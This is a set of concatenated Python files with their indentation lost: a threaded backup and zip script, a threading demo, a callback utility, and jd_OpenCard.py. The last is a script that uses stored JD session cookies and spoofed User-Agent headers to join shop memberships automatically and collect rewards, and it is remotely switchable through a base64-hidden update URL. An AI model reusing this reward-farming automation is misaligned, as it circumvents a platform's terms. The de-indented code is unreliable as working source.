if self.iscan_task_queue.empty():
time.sleep(0.5)
continue
try:
bfile: Path = self.iscan_task_queue.get()
got = True
name = bfile.name
# 现在直接读文件里面的国家和日期
country = self._process_file(bfile)
# 每次保存之前去判断下是否需要修改文件名字并进行压缩备份
date_now_str = datetime.datetime.now().strftime("%Y-%m-%d")
# 新建文件夹的时候需要锁一下,其他时候直接移动即可
with self.__file_locker:
# 先把文件移动过去
dirname: Path = self._databack / country / date_now_str
dirname.mkdir(exist_ok=True, parents=True)
# 移过去的文件名
filename = dirname / name
# 移动到目标文件夹
bfile.replace(filename)
print(
f"Backup file, country:{country}, filename:{name}, date:{date_now_str}")
except:
print(f'Backup file error:\n{traceback.format_exc()}')
finally:
if got:
self.iscan_task_queue.task_done()
def scan_zip_file(self):
"""
压缩文件的线程,每天去扫描一次
将昨天的文件夹压缩到压缩文件夹下
"""
while True:
try:
date_now = datetime.datetime.now().date()
for country in self._databack.iterdir():
if not country.exists():
continue
country_name = country.name
for d_file in country.iterdir():
if self._zip_dealing.__contains__(d_file):
continue
d_name = d_file.name
d_date = datetime.datetime.strptime(
d_name, "%Y-%m-%d").date()
# 如果是今天以前的数据那么就进行压缩
if date_now > d_date:
self._zip_queue.put((d_file, country_name))
with self._zipfile_locker:
# 加入正在处理队列
self._zip_dealing[d_file] = 1
print(
f"A file wait to zip, filename:{d_file.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
print("There is no scan data to zip")
time.sleep(3600)
def process_zip_file(self):
"""
压缩今天以前的文件夹
"""
got = False
zipfile_path = None
while True:
got = False
if self._zip_queue.empty():
time.sleep(1)
continue
try:
zipfile_path, country = self._zip_queue.get()
got = True
zip_store_file = self._zipdata / country
zip_store_file.mkdir(exist_ok=True)
zipname = zip_store_file/f"{zipfile_path.name}.zip"
print(
f"Start zipfile, filename:{zipname.as_posix()}")
# 增加一个写入限制
with zipfile.ZipFile(zipname.as_posix(), 'a', zipfile.ZIP_DEFLATED) as write:
for file in zipfile_path.iterdir():
write.write(file.as_posix())
# 写入后删除
file.unlink()
write.close()
# 最后删除已经压缩好的文件夹
zipfile_path.rmdir()
print(
f"Store zipfile success, filename:{zipname.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
if got:
self._zip_queue.task_done()
with self._zipfile_locker:
self._zip_dealing.pop(zipfile_path, None)
def start(self):
"""
项目启动
:return:
"""
thread1 = threading.Thread(target=self.scan_file, name="scanfile")
thread1.start()
for i in range(self.backup_thread):
t = threading.Thread(target=self.back_file, name=f"backfile{i}")
t.start()
thread2 = threading.Thread(
target=self.scan_zip_file, name=f"scan_zipfile")
thread2.start()
for j in range(self.zip_thread):
tz = threading.Thread(
target=self.process_zip_file, name=f"zipfile{j}")
tz.start()
if __name__ == "__main__":
scup = ScanBackUP()
scup.start()
|
threadDemo.py | import threading, time
print('Start of program.')
def takeANap():
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of program.')
|
async_.py | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import sys
import time
import threading
__all__ = [
'await_callback',
]
class ThreadExceptHookHandler(object):
"""Workaround to deal with a bug in the Python interpreter (!).
Report: http://bugs.python.org/issue1230540
Discussion: https://stackoverflow.com/a/31622038/269335
PR (not yet merged): https://github.com/python/cpython/pull/8610
Disclaimer (!): https://news.ycombinator.com/item?id=11090814
"""
def __enter__(self):
original_init = threading.Thread.__init__
def init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
original_run = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
original_run(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
self._original_init = original_init
threading.Thread.__init__ = init
return self
def __exit__(self, *args):
threading.Thread.__init__ = self._original_init
def await_callback(async_func, callback_name='callback', errback_name=None, *args, **kwargs):
"""Wait for the completion of an asynchronous code that uses callbacks to signal completion.
This helper function turns an async function into a synchronous one,
waiting for its completion before moving forward (without doing a busy wait).
It is useful to minimize "callback hell" when more advanced options
like ``asyncio`` are not available.
Parameters
----------
async_func : callable
An asynchronous function that receives at least one callback parameter
to signal completion.
callback_name : string, optional
Name of the callback parameter of ``async_func``.
Default is `callback`.
errback_name : string, optional
Name of the error handling callback parameter of ``async_func``.
Default is None.
Notes
-----
Exceptions thrown during the async execution are handled and re-thrown as normal
exceptions, even if they were raised on a different thread.
Examples
--------
The following example shows how to await an async function (``do_sync_stuff`` in
the example), using this utility:
.. code-block:: python
from compas.utilities import await_callback
def do_async_stuff(callback):
from threading import Thread
def runner(cb):
print('doing async stuff')
# ..
cb('done')
Thread(target=runner, args=(callback, )).start()
result = await_callback(do_async_stuff)
"""
wait_event = threading.Event()
call_results = {}
def inner_callback(*args, **kwargs):
try:
call_results['args'] = args
call_results['kwargs'] = kwargs
wait_event.set()
except Exception as e:
call_results['exception'] = e
wait_event.set()
kwargs['callback'] = inner_callback
if errback_name:
def inner_errback(error):
if isinstance(error, Exception):
call_results['exception'] = error
else:
call_results['exception'] = Exception(str(error))
wait_event.set()
kwargs[errback_name] = inner_errback
def unhandled_exception_handler(type, value, traceback):
call_results['exception'] = value
wait_event.set()
try:
# Install unhanlded exception handler
sys.excepthook = unhandled_exception_handler
# Invoke async method and wait
with ThreadExceptHookHandler():
async_func(*args, **kwargs)
wait_event.wait()
finally:
# Restore built-in unhanled exception handler
sys.excepthook = sys.__excepthook__
if 'exception' in call_results:
raise call_results['exception']
return_value = call_results['args']
dict_values = call_results['kwargs']
if not dict_values:
# If nothing, then None
if len(return_value) == 0:
return None
# If it's a one-item tuple,
# un-wrap from it and return that element
elif len(return_value) == 1:
return return_value[0]
else:
return return_value
if not return_value:
return dict_values
return return_value + (dict_values,)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
def do_async_stuff(callback):
from threading import Thread
def runner(cb):
print('doing async stuff')
# ..
cb('done')
Thread(target=runner, args=(callback, )).start()
result = await_callback(do_async_stuff)
print(result)
|
jd_OpenCard.py | #!/bin/env python3
# -*- coding: utf-8 -*
'''
项目名称: JD_OpenCard
Author: Curtin
功能:JD入会开卡领取京豆
CreateDate: 2021/5/4 下午1:47
UpdateTime: 2021/6/19
'''
version = 'v1.2.2'
readmes = """
# JD入会领豆小程序

## 使用方法
#### [手机用户(参考) https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw](https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw)
#### [PC用户 (参考) https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A](https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A)
#### [v4-bot用户 (参考) https://github.com/curtinlv/JD-Script/pull/12#issue-652134788](https://github.com/curtinlv/JD-Script/pull/12#issue-652134788)
## 目录结构
JD-Script/ #仓库
|-- LICENSE
|-- OpenCard # 主目录
| |-- jd_OpenCard.py # 主代码 (必要)
| |-- log # 临时目录(可删除)
| |-- OpenCardConfig.ini # 只配置文件(必要)
| |-- Readme.md # 说明书
| `-- start.sh # shell脚本(非必要)
`-- README.md
log目录结构、临时目录(可删除):
log
├── memory.json # 记忆、统计功能临时存放参数
├── shopid-2021-05-23.txt # 记录所有送豆的shopid
├── 入会N豆以上的shopid-2021-05-23.txt # 记录满足入会条件的shopid
├── 入会汇总.txt # 记录所有入会店铺送豆的加入、注销链接
├── 可退会账号【账号id】.txt # 记录跑脚本之前已经过入会且目前送豆的注销链接(可优先退会)
### `【兼容环境】`
1.Python3.3+ 环境
2.兼容ios设备软件:Pythonista 3、Pyto(已测试正常跑,其他软件自行测试)
3.Windows exe
安装依赖模块 :
pip3 install requests
执行:
python3 jd_OpenCard.py
start.sh 脚本运行方法:
1.适合定时任务或不想依赖ini配置文件。
2.支持单号跑多开,如
cp start.sh start_2.sh
sh start_2.sh #只跑里面配置的参数,如cookie
3.定时任务(参考):
0 8 * * * sh /home/curtin/JD-Script/OpenCard/start.sh
2 8 * * * sh /home/curtin/JD-Script/OpenCard/start_2.sh
## `【更新记录】`
2021.6.19: (v1.2.2)
* 修复多线程报错
2021.6.14: (v1.2.1)
* 新增单双线程控制
* 修复一些问题,如腾讯云跑异常报错。
2021.5.28:(v1.2.0)
* 新增单或多账号并发
- Concurrent=yes #开启
* 新增企业微信、Bark推送
* 优化一些逻辑
- 如随机账号查询礼包,仅开启单账号时候
- 京豆统计
2021.5.23:(v1.1.1)
* 修复一些问题及优化一些代码
* 修复Env环境读取变量问题
* 新增 start.sh 运行脚本(可Env环境使用)
- 运行方式 sh start.sh
2021.5.21:(v1.1.0)
* 修复一些问题及优化一些代码:
- 修复最后统计显示为0,新增开卡个数统计
- 修复记忆功能一些bug
- 等等一些小问题
* 新增机器人通知
- 开启远程shopid、配合crontab 坐等收豆
2021.5.15:(v1.0.5)
* 新增远程获取shopid功能
- isRemoteSid=yes #开启
* 修改已知Bug
2021.5.9:(v1.0.4 Beta)
* 优化代码逻辑
* 打包exe版本测试
2021.5.8:(v1.0.3)
* 优化记忆功能逻辑:
- cookiek个数检测
- shopid个数检测
- 上一次中断最后记录的账号id检测不存在本次ck里面
- 临时文件log/memory.json是否存在
- 以上任意一条命中则记忆接力功能不生效。
2021.5.7:(v1.0.2)
* 优化代码逻辑
* 修复已知Bug
2021.5.5:(v1.0.1)
* 新增记忆功能,如中断后下次跑会接着力跑(默认开启)
- memory= True
* 新增仅记录shopid,不入会功能(默认关闭)
- onlyRecord = no
* 修复已知Bug
2021.5.4:(v1.0.0)
* 支持多账号
- JD_COOKIE=pt_key=xxx;pt_pin=xxx;&pt_key=xxx;pt_pin=xxx; #多账号&分隔
* 限制京豆数量入会,例如只入50豆以上
- openCardBean = 50
* 双线程运行
- 默认开启,且您没得选择。
* 记录满足条件的shopid 【record= True】默认开启 (./log 目录可删除)
- log/可销卡汇总.txt #记录开卡送豆的店铺销卡链接
- log/shopid-yyyy-mm-dd.txt #记录当天所有入会送豆的shopid
- log/可销卡账号xxx.txt #记录账号可销卡的店铺
### `【账号参数配置说明】`
### 主配置文件[ OpenCardConfig.ini ] 请保持utf-8默认格式
变量 | 值 | 说明
---- | ----- | ------
JD_COOKIE | pt_key=xxx;pt_pin=xxx; | 必要(多账号&分隔)
openCardBean | 30 | int,入会送豆满足此值,否则不入会
record | False或True | 布尔值,是否记录符合条件的shopid(默认True)
onlyRecord | False或True |布尔值, True:仅记录,不入会(默认False)
memory | False或True | 布尔值,开启记忆功能,接力上一次异常中断位置继续。(默认yes)
printlog | False或True | 布尔值,True:只打印部分日志 False:打印所有日志
sleepNum | False或True | Float,限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
isRemoteSid | False或True | 布尔值,True:使用作者远程仓库更新的id,False:使用本地shopid.txt的id
#### 兼容Env环境(如有配置则优先使用,适合AC、云服务环境等)
export JD_COOKIE='pt_key=xxx;pt_pin=xxx;' (多账号&分隔)
export openCardBean=30
export xxx=xxx
#### Ps:您可以到以下途径获取最新的shopid.txt,定期更新:
###### [GitHub仓库 https://github.com/curtinlv/JD-Script](https://github.com/curtinlv/JD-Script)
###### [Gitee仓库 https://gitee.com/curtinlv/JD-Script](https://gitee.com/curtinlv/JD-Script)
###### [TG频道 https://t.me/TopStyle2021](https://t.me/TopStyle2021)
###### [TG群 https://t.me/topStyle996](https://t.me/topStyle996)
###### 关注公众号【TopStyle】回复:shopid

#
@Last Version: %s
@Last Time: 2021-06-19 13:55
@Author: Curtin
#### **仅以学习交流为主,请勿商业用途、禁止违反国家法律 ,转载请留个名字,谢谢!**
# End.
[回到顶部](#readme)
""" % version
################################ 【Main】################################
import time, os, sys, datetime
import requests
import random, string
import re, json, base64
from urllib.parse import unquote, quote_plus
from threading import Thread
from configparser import RawConfigParser
# 定义一些要用到参数
requests.packages.urllib3.disable_warnings()
scriptHeader = """
════════════════════════════════════════
║ ║
║ JD 入 会 领 豆 ║
║ ║
════════════════════════════════════════
@Version: {}""".format(version)
remarks = '\n\n\tTG交流 : https://t.me/topstyle996\n\n\tTG频道 : https://t.me/TopStyle2021\n\n\t公众号 : TopStyle\n\n\t\t\t--By Curtin\n'
timestamp = int(round(time.time() * 1000))
today = datetime.datetime.now().strftime('%Y-%m-%d')
# 获取当前工作目录
pwd = os.path.dirname(os.path.abspath(__file__)) + os.sep
######
openCardBean = 0
sleepNum = 0.0
record = True
onlyRecord = False
memory = True
printlog = True
isRemoteSid = True
Concurrent = True
TG_BOT_TOKEN = ''
TG_USER_ID = ''
PUSH_PLUS_TOKEN = ''
TG_PROXY_IP = ''
TG_PROXY_PORT = ''
TG_API_HOST = ''
QYWX_AM = ''
BARK = ''
DoubleThread = True
# 获取账号参数
try:
configinfo = RawConfigParser()
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except Exception as e:
with open(pwd + "OpenCardConfig.ini", "r", encoding="UTF-8") as config:
getConfig = config.read().encode('utf-8').decode('utf-8-sig')
with open(pwd + "OpenCardConfig.ini", "w", encoding="UTF-8") as config:
config.write(getConfig)
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="gbk")
cookies = configinfo.get('main', 'JD_COOKIE')
openCardBean = configinfo.getint('main', 'openCardBean')
sleepNum = configinfo.getfloat('main', 'sleepNum')
record = configinfo.getboolean('main', 'record')
onlyRecord = configinfo.getboolean('main', 'onlyRecord')
memory = configinfo.getboolean('main', 'memory')
printlog = configinfo.getboolean('main', 'printlog')
isRemoteSid = configinfo.getboolean('main', 'isRemoteSid')
TG_BOT_TOKEN = configinfo.get('main', 'TG_BOT_TOKEN')
TG_USER_ID = configinfo.get('main', 'TG_USER_ID')
PUSH_PLUS_TOKEN = configinfo.get('main', 'PUSH_PLUS_TOKEN')
TG_PROXY_IP = configinfo.get('main', 'TG_PROXY_IP')
TG_PROXY_PORT = configinfo.get('main', 'TG_PROXY_PORT')
TG_API_HOST = configinfo.get('main', 'TG_API_HOST')
QYWX_AM = configinfo.get('main', 'QYWX_AM')
Concurrent = configinfo.getboolean('main', 'Concurrent')
DoubleThread = configinfo.getboolean('main', 'DoubleThread')
BARK = configinfo.get('main', 'BARK')
except Exception as e:
OpenCardConfigLabel = 1
print("参数配置有误,请检查OpenCardConfig.ini\nError:", e)
print("尝试从Env环境获取!")
def getBool(label):
try:
if label == 'True' or label == 'yes' or label == 'true' or label == 'Yes':
return True
elif label == 'False' or label == 'no' or label == 'false' or label == 'No':
return False
else:
return True
except Exception as e:
print(e)
# 获取系统ENV环境参数优先使用 适合Ac、云服务等环境
# JD_COOKIE=cookie (多账号&分隔)
if "JD_COOKIE" in os.environ:
if len(os.environ["JD_COOKIE"]) > 10:
cookies = os.environ["JD_COOKIE"]
print("已获取并使用Env环境 Cookie")
# 只入送豆数量大于此值
if "openCardBean" in os.environ:
if len(os.environ["openCardBean"]) > 0:
openCardBean = int(os.environ["openCardBean"])
print("已获取并使用Env环境 openCardBean:", openCardBean)
elif not openCardBean:
openCardBean = 0
# 是否开启双线程
if "DoubleThread" in os.environ:
if len(os.environ["DoubleThread"]) > 1:
DoubleThread = getBool(os.environ["DoubleThread"])
print("已获取并使用Env环境 DoubleThread", DoubleThread)
# 多账号并发
if "Concurrent" in os.environ:
if len(os.environ["Concurrent"]) > 1:
Concurrent = getBool(os.environ["Concurrent"])
print("已获取并使用Env环境 Concurrent", Concurrent)
elif not Concurrent:
Concurrent = True
# 限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
if "sleepNum" in os.environ:
if len(os.environ["sleepNum"]) > 0:
sleepNum = float(os.environ["sleepNum"])
print("已获取并使用Env环境 sleepNum:", sleepNum)
elif not sleepNum:
sleepNum = 0
if "printlog" in os.environ:
if len(os.environ["printlog"]) > 1:
printlog = getBool(os.environ["printlog"])
print("已获取并使用Env环境 printlog:", printlog)
elif not printlog:
printlog = True
# 是否记录符合条件的shopid,输出文件【OpenCardlog/yes_shopid.txt】 False|True
if "record" in os.environ:
if len(os.environ["record"]) > 1:
record = getBool(os.environ["record"])
print("已获取并使用Env环境 record:", record)
elif not record:
record = True
# 仅记录,不入会。入会有豆的shopid输出文件
if "onlyRecord" in os.environ:
if len(os.environ["onlyRecord"]) > 1:
onlyRecord = getBool(os.environ["onlyRecord"])
print("已获取并使用Env环境 onlyRecord:", onlyRecord)
elif not onlyRecord:
onlyRecord = False
# 开启记忆, 需要record=True且 memory= True 才生效
if "memory" in os.environ:
if len(os.environ["memory"]) > 1:
memory = getBool(os.environ["memory"])
print("已获取并使用Env环境 memory:", memory)
elif not memory:
memory = True
# 是否启用远程shopid
if "isRemoteSid" in os.environ:
if len(os.environ["isRemoteSid"]) > 1:
isRemoteSid = getBool(os.environ["isRemoteSid"])
print("已获取并使用Env环境 isRemoteSid:", isRemoteSid)
elif not isRemoteSid:
isRemoteSid = True
# 获取TG_BOT_TOKEN
if "TG_BOT_TOKEN" in os.environ:
if len(os.environ["TG_BOT_TOKEN"]) > 1:
TG_BOT_TOKEN = os.environ["TG_BOT_TOKEN"]
print("已获取并使用Env环境 TG_BOT_TOKEN")
# 获取TG_USER_ID
if "TG_USER_ID" in os.environ:
if len(os.environ["TG_USER_ID"]) > 1:
TG_USER_ID = os.environ["TG_USER_ID"]
print("已获取并使用Env环境 TG_USER_ID")
# 获取代理ip
if "TG_PROXY_IP" in os.environ:
if len(os.environ["TG_PROXY_IP"]) > 1:
TG_PROXY_IP = os.environ["TG_PROXY_IP"]
print("已获取并使用Env环境 TG_PROXY_IP")
# 获取TG 代理端口
if "TG_PROXY_PORT" in os.environ:
if len(os.environ["TG_PROXY_PORT"]) > 1:
TG_PROXY_PORT = os.environ["TG_PROXY_PORT"]
print("已获取并使用Env环境 TG_PROXY_PORT")
elif not TG_PROXY_PORT:
TG_PROXY_PORT = ''
# 获取TG TG_API_HOST
if "TG_API_HOST" in os.environ:
if len(os.environ["TG_API_HOST"]) > 1:
TG_API_HOST = os.environ["TG_API_HOST"]
print("已获取并使用Env环境 TG_API_HOST")
# 获取pushplus+ PUSH_PLUS_TOKEN
if "PUSH_PLUS_TOKEN" in os.environ:
if len(os.environ["PUSH_PLUS_TOKEN"]) > 1:
PUSH_PLUS_TOKEN = os.environ["PUSH_PLUS_TOKEN"]
print("已获取并使用Env环境 PUSH_PLUS_TOKEN")
# 获取企业微信应用推送 QYWX_AM
if "QYWX_AM" in os.environ:
if len(os.environ["QYWX_AM"]) > 1:
QYWX_AM = os.environ["QYWX_AM"]
print("已获取并使用Env环境 QYWX_AM")
# 获取企业微信应用推送 QYWX_AM
if "BARK" in os.environ:
if len(os.environ["BARK"]) > 1:
BARK = os.environ["BARK"]
print("已获取并使用Env环境 BARK")
# 判断参数是否存在
try:
cookies
except NameError as e:
var_exists = False
print("[OpenCardConfig.ini] 和 [Env环境] 都无法获取到您的cookies,请配置!\nError:", e)
time.sleep(60)
exit(1)
else:
var_exists = True
# 创建临时目录
if not os.path.exists(pwd + "log"):
os.mkdir(pwd + "log")
# 记录功能json
memoryJson = {}
message_info = ''
notify_mode = []
################################### Function ################################
class TaskThread(Thread):
"""
处理task相关的线程类
"""
def __init__(self, func, args=()):
super(TaskThread, self).__init__()
self.func = func # 要执行的task类型
self.args = args # 要传入的参数
def run(self):
self.result = self.func(*self.args) # 将任务执行结果赋值给self.result变量
def get_result(self):
# 改方法返回task函数的执行结果,方法名不是非要get_result
try:
return self.result
except Exception as ex:
print(ex)
return "ERROR"
def nowtime():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def printinfo(context, label: bool):
if label == False:
print(context)
def exitCodeFun(code):
try:
if sys.platform == 'win32' or sys.platform == 'cygwin':
print("连按回车键即可退出窗口!")
exitCode = input()
exit(code)
except:
time.sleep(3)
exit(code)
def message(str_msg):
global message_info
print(str_msg)
message_info = "{}\n{}".format(message_info, str_msg)
sys.stdout.flush()
# 获取通知,
if PUSH_PLUS_TOKEN:
notify_mode.append('pushplus')
if TG_BOT_TOKEN and TG_USER_ID:
notify_mode.append('telegram_bot')
if QYWX_AM:
notify_mode.append('wecom_app')
if BARK:
notify_mode.append('bark')
# tg通知
def telegram_bot(title, content):
try:
print("\n")
bot_token = TG_BOT_TOKEN
user_id = TG_USER_ID
if not bot_token or not user_id:
print("tg服务的bot_token或者user_id未设置!!\n取消推送")
return
print("tg服务启动")
if TG_API_HOST:
if 'http' in TG_API_HOST:
url = f"{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://api.telegram.org/bot{TG_BOT_TOKEN}/sendMessage"
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = {'chat_id': str(TG_USER_ID), 'text': f'{title}\n\n{content}', 'disable_web_page_preview': 'true'}
proxies = None
if TG_PROXY_IP and TG_PROXY_PORT:
proxyStr = "http://{}:{}".format(TG_PROXY_IP, TG_PROXY_PORT)
proxies = {"http": proxyStr, "https": proxyStr}
try:
response = requests.post(url=url, headers=headers, params=payload, proxies=proxies).json()
except:
print('推送失败!')
if response['ok']:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# push推送
def pushplus_bot(title, content):
try:
print("\n")
if not PUSH_PLUS_TOKEN:
print("PUSHPLUS服务的token未设置!!\n取消推送")
return
print("PUSHPLUS服务启动")
url = 'http://www.pushplus.plus/send'
data = {
"token": PUSH_PLUS_TOKEN,
"title": title,
"content": content
}
body = json.dumps(data).encode(encoding='utf-8')
headers = {'Content-Type': 'application/json'}
response = requests.post(url=url, data=body, headers=headers).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# BARK
def bark_push(title, content):
print("\n")
if not BARK:
print("bark服务的bark_token未设置!!\n取消推送")
return
print("bark服务启动")
try:
response = requests.get('''https://api.day.app/{0}/{1}/{2}'''.format(BARK, title, quote_plus(content))).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
print('Bark推送失败!')
def send(title, content):
"""
使用 bark, telegram bot, dingding bot, serverJ 发送手机推送
:param title:
:param content:
:return:
"""
content = content + "\n\n" + footer
for i in notify_mode:
if i == 'telegram_bot':
if TG_BOT_TOKEN and TG_USER_ID:
telegram_bot(title=title, content=content)
else:
print('未启用 telegram机器人')
continue
elif i == 'pushplus':
if PUSH_PLUS_TOKEN:
pushplus_bot(title=title, content=content)
else:
print('未启用 PUSHPLUS机器人')
continue
elif i == 'wecom_app':
if QYWX_AM:
wecom_app(title=title, content=content)
else:
print('未启用企业微信应用消息推送')
continue
elif i == 'bark':
if BARK:
bark_push(title=title, content=content)
else:
print('未启用Bark APP应用消息推送')
continue
else:
print('此类推送方式不存在')
# 企业微信 APP 推送
def wecom_app(title, content):
try:
if not QYWX_AM:
print("QYWX_AM 并未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(',', QYWX_AM)
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except:
media_id = ''
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + '\n\n' + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == 'ok':
print('推送成功!')
else:
print('推送失败!错误信息如下:\n', response)
except Exception as e:
print(e)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
values = {'corpid': self.CORPID,
'corpsecret': self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {
"content": message
},
"safe": "0"
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace('\n', '<br/>'),
"digest": message
}
]
}
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
# 检测cookie格式是否正确
def iscookie():
"""
:return: cookiesList,userNameList,pinNameList
"""
cookiesList = []
userNameList = []
pinNameList = []
if 'pt_key=' in cookies and 'pt_pin=' in cookies:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
result = r.findall(cookies)
if len(result) >= 1:
message("您已配置{}个账号".format(len(result)))
u = 1
for i in result:
r = re.compile(r"pt_pin=(.*?);")
pinName = r.findall(i)
pinName = unquote(pinName[0])
# 获取账号名
ck, nickname = getUserInfo(i, pinName, u)
if nickname != False:
cookiesList.append(ck)
userNameList.append(nickname)
pinNameList.append(pinName)
else:
u += 1
continue
u += 1
if len(cookiesList) > 0 and len(userNameList) > 0:
return cookiesList, userNameList, pinNameList
else:
message("没有可用Cookie,已退出")
exitCodeFun(3)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
# 检查是否有更新版本
def gettext(url):
try:
resp = requests.get(url, timeout=60).text
if '该内容无法显示' in resp:
return gettext(url)
return resp
except Exception as e:
print(e)
def isUpdate():
global footer, readme1, readme2, readme3, uPversion
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvdXBkYXRlLmpzb24=")
try:
result = gettext(url)
result = json.loads(result)
isEnable = result['isEnable']
uPversion = result['version']
info = result['info']
readme1 = result['readme1']
readme2 = result['readme2']
readme3 = result['readme3']
pError = result['m']
footer = result['footer']
getWait = result['s']
if isEnable > 50 and isEnable < 150:
if version != uPversion:
print(f"\n当前最新版本:【{uPversion}】\n\n{info}\n")
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
print(pError)
time.sleep(300)
exit(666)
except:
message("请检查您的环境/版本是否正常!")
time.sleep(10)
exit(666)
def getUserInfo(ck, pinName, userNum):
url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback=GetJDUserInfoUnion'
headers = {
'Cookie': ck,
'Accept': '*/*',
'Connection': 'close',
'Referer': 'https://home.m.jd.com/myJd/home.action',
'Accept-Encoding': 'gzip, deflate, br',
'Host': 'me-api.jd.com',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
'Accept-Language': 'zh-cn'
}
try:
resp = requests.get(url=url, verify=False, headers=headers, timeout=60).text
r = re.compile(r'GetJDUserInfoUnion.*?\((.*?)\)')
result = r.findall(resp)
userInfo = json.loads(result[0])
nickname = userInfo['data']['userInfo']['baseInfo']['nickname']
return ck, nickname
except Exception:
context = f"账号{userNum}【{pinName}】Cookie 已失效!请重新获取。"
message(context)
send("【JD入会领豆】Cookie 已失效!", context)
return ck, False
# 设置Headers
def setHeaders(cookie, intype):
if intype == 'mall':
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Host": "mall.jd.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15",
"Accept-Language": "zh-cn",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "close"
}
return headers
elif intype == 'JDApp':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "jdapp;iPhone;9.4.8;14.3;809409cbd5bb8a0fa8fff41378c1afe91b8075ad;network/wifi;ADID/201EDE7F-5111-49E8-9F0D-CCF9677CD6FE;supportApplePay/0;hasUPPay/0;hasOCPay/0;model/iPhone13,4;addressid/;supportBestPay/0;appBuild/167629;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1",
'Accept-Language': "zh-cn"
}
return headers
elif intype == 'mh5':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
'Accept-Language': "zh-cn"
}
return headers
